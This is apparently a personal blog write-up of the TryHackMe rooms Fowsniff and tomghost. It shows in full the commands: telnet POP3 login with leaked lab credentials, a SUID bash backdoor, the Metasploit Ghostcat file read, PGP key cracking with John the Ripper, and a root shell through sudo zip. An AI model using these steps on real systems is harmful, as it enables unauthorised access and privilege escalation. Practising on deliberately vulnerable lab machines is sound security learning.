THM: Stuff

I’ve been doing a little bit of blue-teaming learning but I wanted to feel like I’d achieved something so I ran through Fowsniff and tomghost. I don’t have much to say about Fowsniff, although I will record the telnet commands used to connect to the POP3 server:

└─# telnet fowsniff 110  
Connected to fowsniff.
Escape character is '^]'.
+OK Welcome to the Fowsniff Corporate Mail Server!
USER seina
PASS scoobydoo2
+OK Logged in.
+OK 2 messages:
1 1622
2 1280
retr 1
+OK 1622 octets
Return-Path: <stone@fowsniff>
X-Original-To: seina@fowsniff
Delivered-To: seina@fowsniff
Received: by fowsniff (Postfix, from userid 1000)
        id 0FA3916A; Tue, 13 Mar 2018 14:51:07 -0400 (EDT)
To: baksteen@fowsniff, mauer@fowsniff, mursten@fowsniff,
# etc

For the root section, this had a shell script being executed as root during an SSH login. It suggested we send ourselves a root shell but instead I copied bash with the SUID bit and then ran it when I logged in, i.e in the script.

cp /bin/bash /tmp/bash
chmod a+s /tmp/bash


baksteen@fowsniff:~$ /tmp/bash -p
bash-4.3# id;hostname;date
uid=1004(baksteen) gid=100(users) euid=0(root) egid=0(root) groups=0(root),100(users),1001(baksteen)
Wed Jul 14 07:13:45 EDT 2021


The name obviously refers to ghostcat, which is a file read vulnerability in TomCat.

I use MSF, because why not?

msf6 > search ghostcat

Matching Modules

   #  Name                                  Disclosure Date  Rank    Check  Description
   -  ----                                  ---------------  ----    -----  -----------
   0  auxiliary/admin/http/tomcat_ghostcat  2020-02-20       normal  Yes    Ghostcat

Interact with a module by name or index. For example info 0, use 0 or use auxiliary/admin/http/tomcat_ghostcat

msf6 > use 0
msf6 auxiliary(admin/http/tomcat_ghostcat) > show options

Module options (auxiliary/admin/http/tomcat_ghostcat):

   Name      Current Setting   Required  Description
   ----      ---------------   --------  -----------
   AJP_PORT  8009              no        The Apache JServ Protocol (AJP) port
   FILENAME  /WEB-INF/web.xml  yes       File name
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT     8080              yes       The Apache Tomcat webserver port (TCP)
   SSL       false             yes       SSL

msf6 auxiliary(admin/http/tomcat_ghostcat) > set rhosts
rhosts =>
msf6 auxiliary(admin/http/tomcat_ghostcat) > run
[*] Running module against
Status Code: 200
Accept-Ranges: bytes
ETag: W/"1261-1583902632000"
Last-Modified: Wed, 11 Mar 2020 04:57:12 GMT
Content-Type: application/xml
Content-Length: 1261
<?xml version="1.0" encoding="UTF-8"?>
 Licensed to the Apache Software Foundation (ASF) under one or more
  contributor license agreements.  See the NOTICE file distributed with
  this work for additional information regarding copyright ownership.
  The ASF licenses this file to You under the Apache License, Version 2.0
  (the "License"); you may not use this file except in compliance with
  the License.  You may obtain a copy of the License at

  Unless required by applicable law or agreed to in writing, software
  distributed under the License is distributed on an "AS IS" BASIS,
  See the License for the specific language governing permissions and
  limitations under the License.
<web-app xmlns=""

  <display-name>Welcome to Tomcat</display-name>
     Welcome to GhostCat


[+] - /root/.msf4/loot/20210714072054_default_10.10.106.165_WEBINFweb.xml_635386.txt
[*] Auxiliary module execution completed
msf6 auxiliary(admin/http/tomcat_ghostcat) > quit

We got some credentials. This could be for the Tomcat manager app, but let’s try SSH first:

└─# ssh skyfuck@         
The authenticity of host ' (' can't be established.
ECDSA key fingerprint is SHA256:hNxvmz+AG4q06z8p74FfXZldHr0HJsaa1FBXSoTlnss.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '' (ECDSA) to the list of known hosts.
skyfuck@'s password: 
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-174-generic x86_64)

 * Documentation:
 * Management:
 * Support:

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

skyfuck@ubuntu:~$ sudo -l
[sudo] password for skyfuck: 
Sorry, user skyfuck may not run sudo on ubuntu.

Yep. We have some PGP files:

skyfuck@ubuntu:~$ ls -lash
total 40K
4.0K drwxr-xr-x 3 skyfuck skyfuck 4.0K Jul 14 04:21 .
4.0K drwxr-xr-x 4 root    root    4.0K Mar 10  2020 ..
4.0K -rw------- 1 skyfuck skyfuck  136 Mar 10  2020 .bash_history
4.0K -rw-r--r-- 1 skyfuck skyfuck  220 Mar 10  2020 .bash_logout
4.0K -rw-r--r-- 1 skyfuck skyfuck 3.7K Mar 10  2020 .bashrc
4.0K drwx------ 2 skyfuck skyfuck 4.0K Jul 14 04:21 .cache
4.0K -rw-rw-r-- 1 skyfuck skyfuck  394 Mar 10  2020 credential.pgp
4.0K -rw-r--r-- 1 skyfuck skyfuck  655 Mar 10  2020 .profile
8.0K -rw-rw-r-- 1 skyfuck skyfuck 5.1K Mar 10  2020 tryhackme.asc

We need to exfil the asc file and crack the password:

└─# scp skyfuck@ tryhackme.asc
skyfuck@ password: 
tryhackme.asc                                                                                                        100% 5144    15.7KB/s   00:00    
└─# gpg2john tryhackme.asc > tryhackme.john
File tryhackme.asc
└─# john tryhackme.john -w=/usr/share/wordlists/rockyou.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (gpg, OpenPGP / GnuPG Secret Key [32/64])
Cost 1 (s2k-count) is 65536 for all loaded hashes
Cost 2 (hash algorithm [1:MD5 2:SHA1 3:RIPEMD160 8:SHA256 9:SHA384 10:SHA512 11:SHA224]) is 2 for all loaded hashes
Cost 3 (cipher algorithm [1:IDEA 2:3DES 3:CAST5 4:Blowfish 7:AES128 8:AES192 9:AES256 10:Twofish 11:Camellia128 12:Camellia192 13:Camellia256]) is 9 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
alexandru        (tryhackme)
1g 0:00:00:00 DONE (2021-07-14 07:25) 11.11g/s 11911p/s 11911c/s 11911C/s chinita..alexandru
Use the "--show" option to display all of the cracked passwords reliably
Session completed

And then we can extract the encrypted file:

skyfuck@ubuntu:~$ gpg --import tryhackme.asc 
gpg: key C6707170: secret key imported
gpg: /home/skyfuck/.gnupg/trustdb.gpg: trustdb created
gpg: key C6707170: public key "tryhackme <>" imported
gpg: key C6707170: "tryhackme <>" not changed
gpg: Total number processed: 2
gpg:               imported: 1
gpg:              unchanged: 1
gpg:       secret keys read: 1
gpg:   secret keys imported: 1
skyfuck@ubuntu:~$ gpg --decrypt credential.pgp 

You need a passphrase to unlock the secret key for
user: "tryhackme <>"
1024-bit ELG-E key, ID 6184FBCC, created 2020-03-11 (main key ID C6707170)

gpg: gpg-agent is not available in this session
gpg: WARNING: cipher algorithm CAST5 not found in recipient preferences
gpg: encrypted with 1024-bit ELG-E key, ID 6184FBCC, created 2020-03-11
      "tryhackme <>"

Next, we can su merlin and privesc with zip per GTFOBins:

merlin@ubuntu:/home/skyfuck$ sudo -l
Matching Defaults entries for merlin on ubuntu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User merlin may run the following commands on ubuntu:
    (root : root) NOPASSWD: /usr/bin/zip
merlin@ubuntu:/home/skyfuck$ TF=$(mktemp -u)
merlin@ubuntu:/home/skyfuck$ sudo -u root /usr/bin/zip $TF /etc/hosts -T -TT 'sh #'
  adding: etc/hosts (deflated 31%)
# id;hostname;date
uid=0(root) gid=0(root) groups=0(root)
Wed Jul 14 04:27:21 PDT 2021

Not difficult but still enjoyable.